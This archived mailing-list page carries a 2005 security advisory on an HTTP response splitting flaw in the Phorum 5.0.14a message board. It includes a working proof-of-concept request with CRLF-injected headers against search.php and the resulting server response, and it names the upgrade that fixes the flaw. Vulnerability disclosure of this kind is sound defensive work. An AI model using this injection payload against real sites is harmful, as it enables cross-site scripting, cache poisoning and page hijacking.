Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[ Positive Technologies #SA] Phorum "location" HTTP Response Splittin

from [Alexander Anisimov] Network Security [Permanent Link]
Subject: [ Positive Technologies #SA] Phorum "location" HTTP Response Splitting Vulnerability
Date: 22 Mar 2005 14:37:39 -0000 


         [ Positive Technologies SA-20050322 ]
   Phorum "location" HTTP Response Splitting Vulnerability.

   Release Date:     03/22/2005
   Date Reported:    03/10/2005
   Severity:         Medium
   Application:      Phorum
   Platform:         PHP
   Vendor:           http://www.phorum.org
   Affects versions: 5.0.14a
                     Other versions may also be affected.


I. BACKGROUND

Phorum is a web based message board written in PHP. Phorum is designed
with high-availability and visitor ease of use in mind. Features such
as mailing list integration, easy customization and simple installation
make Phorum a powerful add-in to any website.


II. DESCRIPTION

Input passed to the "Location" parameter is not properly sanitised.
This can be exploited to inject malicious characters into HTTP headers
and may allow execution of arbitrary HTML and script code in a user's
browser session in context of an affected site.

 
Request:
http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a<html>Scanned
 by 
PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30


Result:

HTTP/1.1 302 Found
Date: Tue, 01 Mar 2005 12:33:53 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Location: 
http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34

<html>Scanned by PTsecurity</html>
,author=1,subject=1
Connection: close
Content-Type: text/html

<...>


This vulnerability was discovered by Positive Technologies using MaxPatrol
(www.maxpatrol.com) - intellectual professional security scanner. It is able to 
detect a substantial amount of vulnerabilities not published yet.
MaxPatrol's intelligent algorithms are also capable to detect a lot of
vulnerabilities in custom web-scripts (XSS, SQL and code injections, HTTP 
Response splitting).

The vulnerability has been reported in Phorum version 5.0.14.
Other versions may also be affected.


III. ANALYSIS

Exploitation of this vulnerability allows remote attackers to mount various
kinds of attacks. For example: Cross-Site Scripting (XSS), Web Cache
Poisoning (deface), Browser cache poisoning, Hijacking pages with
user-specific information and etc...


IV. SOLUTION
Update to version 5.0.15a.

http://phorum.org/story.php?48
http://phorum.org/downloads/phorum-5.0.15a.tar.gz
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [ Positive Technologies #SA] Phorum "location" HTTP Response Splitting Vulnerability, Alexander Anisimov <=
Previous by Date:  Re: New Whitepaper: Anti Brute Force Resource Metering, Amit Klein (AKsecurity)
Next by Date:  Black Hat Briefings & Trainings: Registration now open!, Jeff Moss
Previous by Thread:  Nortel VPN Client Issue: Clear-text password stored in memory, Roy Hills
Next by Thread:  Black Hat Briefings & Trainings: Registration now open!, Jeff Moss
Indexes:  [Date] [Thread] [Top] [All Lists]